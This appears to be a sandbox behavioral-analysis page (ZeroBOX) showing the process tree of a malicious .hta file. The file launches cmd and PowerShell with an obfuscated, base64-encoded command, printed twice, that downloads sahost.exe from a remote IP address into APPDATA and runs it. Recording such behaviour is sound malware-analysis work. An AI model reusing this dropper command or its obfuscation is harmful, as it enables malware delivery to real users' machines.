| ZeroBOX

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\95.hta.html
2748
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2748 CREDAT:145409
  2836
  - cmd.exe "C:\Windows\system32\cmd.exe" "/c POwErshell.exE -ex BYPass -NOp -W 1 -C dEVicecRedentialDEPLoYmEnT.eXE ; IEx($(IEx('[syStem.TEXT.eNcoding]'+[chAR]58+[cHaR]58+'utf8.GETsTRiNG([SYStEM.cONVERT]'+[cHar]58+[CHAR]0x3A+'FROMbaSe64STRIng('+[ChAR]34+'JHB6Sk1zRlppYyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZVJEZWZJTklUSU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNT04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6RVNuLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBITkNaTVhPaFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVOUGVYdSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFhVlpraUh4WixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm9mQ0gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIldTQkciICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc1BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR1dGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHB6Sk1zRlppYzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvOTUvc2Fob3N0LmV4ZSIsIiRlblY6QVBQREFUQVxzYWhvc3QuZXhlIiwwLDApO3N0YXJ0LXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2Fob3N0LmV4ZSI='+[chAR]0X22+'))')))"
    744
    - powershell.exe POwErshell.exE -ex BYPass -NOp -W 1 -C dEVicecRedentialDEPLoYmEnT.eXE ; IEx($(IEx('[syStem.TEXT.eNcoding]'+[chAR]58+[cHaR]58+'utf8.GETsTRiNG([SYStEM.cONVERT]'+[cHar]58+[CHAR]0x3A+'FROMbaSe64STRIng('+[ChAR]34+'JHB6Sk1zRlppYyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZVJEZWZJTklUSU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNT04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6RVNuLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBITkNaTVhPaFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVOUGVYdSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFhVlpraUh4WixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm9mQ0gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIldTQkciICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc1BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR1dGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHB6Sk1zRlppYzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvOTUvc2Fob3N0LmV4ZSIsIiRlblY6QVBQREFUQVxzYWhvc3QuZXhlIiwwLDApO3N0YXJ0LXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2Fob3N0LmV4ZSI='+[chAR]0X22+'))')))"
      1384
      - csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\msbjefz5.cmdline"
        504
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESBB2E.tmp" "c:\Users\test22\AppData\Local\Temp\CSCBAB0.tmp"
        1272

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents